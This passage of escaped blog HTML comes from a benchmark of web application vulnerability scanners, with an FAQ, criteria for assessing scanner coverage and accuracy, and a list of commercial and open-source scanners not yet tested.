href=&quot;http://www.astalavista.com/&quot;&gt;http://www.astalavista.com/&lt;/a&gt;), &lt;b&gt;Google&lt;/b&gt; (of course) and many others.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I hope that the conclusions, ideas, information and payloads presented in this research (and the benchmarks and tools that will follow) will be for the benefit of all vendors, open source community projects and commercial vendors alike. &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025816&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;28. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Frequently Asked Questions&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Q&lt;/b&gt;: &lt;b&gt;60&lt;/b&gt; web application scanners is an awful lot, how many scanners exist?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;A&lt;/b&gt;: Assuming you are using the same definition for a scanner that I do, then I&#39;m currently aware of &lt;b&gt;&lt;u&gt;95&lt;/u&gt;&lt;/b&gt; web application scanners that can claim to support the detection of &lt;b&gt;generic application level exposures, in a safe an controllable manner, and in multiple URLs&lt;/b&gt; (48 free &amp;amp; open source scanners that were tested, 12 commercial scanners that were tested, 25 open source scanners that I didn&#39;t test yet, and 10 commercial scanners that slipped my grip). And yes, I&#39;m planning on testing them all.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Q&lt;/b&gt;: Why RXSS and SQLi again? Will the benchmarks ever include additional exposures?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;A&lt;/b&gt;: Yes, they will. In fact, I&#39;m already working on test case categories of two different exposures, and will use them both for my next research. Besides, the last benchmark focused on free &amp;amp; open source products, and I couldn&#39;t help myself, I had to test them against each other.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Q&lt;/b&gt;: I can&#39;t wait for the next research, what can I do to speed things up?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;A&lt;/b&gt;: I&#39;m currently looking for methods to speed up the processes related to these researches, so if you&#39;re willing to help, contact me.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Q: &lt;/b&gt;What’s with the titles that contain cheesy movie quotes?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;A&lt;/b&gt;: That&#39;s just it - I&lt;b&gt; &lt;/b&gt;happen to like cheese. Let&#39;s see you coming up with better titles at 4AM.&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025817&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Ref300025565&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;29. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix A – Assessing Web Application Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Although this benchmark contains tons of information, and is &lt;b&gt;very useful&lt;/b&gt; as a decision assisting tool, the content within it cannot be used to calculate the accurate ROI (return of investment) of each web application scanner. Furthermore, it can&#39;t predict on its own exactly how good will the results of each scanner be in every situation (&lt;b&gt;&lt;u&gt;but it can predict what won&#39;t be detected&lt;/u&gt;&lt;/b&gt;), since there are additional factors that need to be taken into account.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results in this benchmark could serve as an accurate evaluation formula only if the scanner will be used to scan a technology that it supports, pages that it can detect (manual crawling features can be used to overcome many obstacles in this case), and locations without technological barriers that it cannot handle (for example, web application firewalls or anti-CSRF tokens).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;In order for us to truly assess the full capability of web application vulnerability scanners, the following features must be tested:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The entry point coverage of the web application scanner must be as high as possible; meaning, the tool must be able to &lt;b&gt;locate&lt;/b&gt; and &lt;b&gt;properly&lt;/b&gt; &lt;b&gt;activate&lt;/b&gt; (or be manually &quot;taught&quot;) all the application entry points (e.g. static &amp;amp; dynamic pages, in-page events, services, filters, etc). Vulnerabilities in an entry point that wasn&#39;t located will not be detected. The &lt;a href=&quot;http://code.google.com/p/wivet/&quot;&gt;WIVET&lt;/a&gt; project can provide additional information on coverage and support.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The attack vector coverage of the web application scanner – does it support input vectors such as GET / POST / Cookie parameters? HTTP headers? Parameter Names? Ajax Parameters? Serialized Objects? Each input vector that is not supported means exposures that won&#39;t be detected, regardless of the tool&#39;s accuracy level (assuming the unsupported attack/input vector is vulnerable).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The scanner must be able to handle the technological barriers implemented in the application, ranging from authentication mechanism to automated access prevention mechanisms such as CAPTCHAs and anti-CSRF tokens.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The scanner must be able to handle any application specific problems it encounters, including malformed HTML (tolerance), stability issues and other limitations. If the best scanner in the world will consistently cause the application to crash in a couple of seconds, then it&#39;s not useful for assessing the security of that application (in matters that don&#39;t relate to DoS attacks).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The number of features (active &amp;amp; passive) implemented in the web application vulnerability scanner.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The accuracy level of each and every plugin supported by the web application vulnerability scanner.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;That being said, it&#39;s crucial to remember that even in the most ideal scenario, with the absence of human intelligence, scanners can&#39;t detect all the instances of exposures that are truly logical – meaning, are related to specific business logic, and thus, are not perceived as an issue by an entity that can&#39;t understand the business logic. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;But the sheer complexity of the issue &lt;b&gt;does not mean&lt;/b&gt; that we shouldn&#39;t start somewhere, and that&#39;s exactly what I&#39;m trying to do in my benchmarks – create a scientific, accurate foundation for obtaining that goal, with enough investment, over time.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Note that my explanations describe only a portion of the actual tests that should be performed, and I&#39;m sharing them only to emphasize the true complexity of the core issue; I haven&#39;t touched stability, bugs, and a lot of other subjects, which may affect the overall result you get.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Additional information on evaluation standards for web application vulnerability scanners can be found in the &lt;a href=&quot;http://projects.webappsec.org/w/page/13246986/Web%20Application%20Security%20Scanner%20Evaluation%20Criteria&quot;&gt;WASC Web Application Security Scanner Evaluation Criteria&lt;/a&gt; web site.&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025818&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Ref280855248&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Ref280855122&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;30. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix B – A List of Tools &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Not Included In the Test&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following &lt;b&gt;&lt;i&gt;commercial&lt;/i&gt;&lt;/b&gt; web application vulnerability scanners were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt;&lt;/b&gt;&lt;i&gt; &lt;/i&gt;in the benchmark, since I didn&#39;t manage to get an evaluation version until the article publication deadline, or in the case of one scanner (mcafee), had problems with the evaluation version that I didn&#39;t manage to work out until the benchmark&#39;s deadline:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Commercial Scanners not included in this benchmark&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.nstalker.com/&quot;&gt;&lt;b&gt;&lt;i&gt;N-Stalker&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;Commercial Edition&lt;/i&gt;&lt;/b&gt;&lt;/a&gt; (N-Stalker) &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.mcafee.com/us/products/vulnerability-manager.aspx&quot;&gt;&lt;b&gt;&lt;i&gt;McAfee Vulnerability Manager&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(McAfee / Foundstone)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.rapid7.com/products/nexpose-enterprise-edition.jsp&quot;&gt;&lt;b&gt;&lt;i&gt;NeXpose Enterprise Edition Web Application Scanning Features&lt;/i&gt;&lt;/b&gt;&lt;/a&gt; (Rapid7)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.eeye.com/Products/Retina/Web-Security-Scanner.aspx&quot;&gt;&lt;b&gt;&lt;i&gt;Retina Web Application Scanner&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(eEye Digital Security)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.ncircle.com/index.php?s=products_webapp360&quot;&gt;&lt;b&gt;&lt;i&gt;WebApp360&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(NCircle)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.coresecurity.com/content/web-app-pro&quot;&gt;&lt;b&gt;&lt;i&gt;Core Impact Pro Web Application Scanning Features&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(Core Impact)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.parasoft.com/jsp/products/article.jsp?label=product_info_WebKing&quot;&gt;&lt;b&gt;&lt;i&gt;Parasoft Web Application Scanning Features&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(a.k.a &lt;b&gt;&lt;i&gt;WebKing, &lt;/i&gt;&lt;/b&gt;by Parasoft)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.dbappsecurity.com/webscan.html&quot;&gt;&lt;b&gt;&lt;i&gt;MatriXay Web Application Scanner&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(DBAppSecurity)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.buyservers.net/falcove.htm&quot;&gt;&lt;b&gt;&lt;i&gt;Falcove&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(BuyServers ltd, currently Unmaintained)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.safe3.com.cn/en/safe3wvs.htm&quot;&gt;&lt;b&gt;&lt;i&gt;Safe3WVS 9.2 Commercial Edition&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(Safe3 Network Center)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following &lt;b&gt;&lt;i&gt;open source&lt;/i&gt;&lt;/b&gt; web application vulnerability scanners were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt; &lt;/b&gt;in the benchmark, mainly due to time restrictions, but will be included in future benchmarks:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Open Source Scanners not included in this benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/rabbit-vs/&quot;&gt;&lt;b&gt;&lt;i&gt;Rabbit VS&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/spacemonkey/&quot;&gt;&lt;b&gt;&lt;i&gt;Spacemonkey&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/kayra/&quot;&gt;&lt;b&gt;&lt;i&gt;Kayra&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/2gwvs/&quot;&gt;&lt;b&gt;&lt;i&gt;2gwvs&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/webarmy/&quot;&gt;&lt;b&gt;&lt;i&gt;Webarmy&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/springenwerk/&quot;&gt;&lt;b&gt;&lt;i&gt;springenwerk&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/mopest/&quot;&gt;&lt;b&gt;&lt;i&gt;Mopset 2&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://ha.ckers.org/blog/20060921/xssfuzz-released/&quot;&gt;&lt;b&gt;XSSFuzz 1.1&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/witchxtool-v10/&quot;&gt;&lt;b&gt;&lt;i&gt;Witchxtoolv&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div 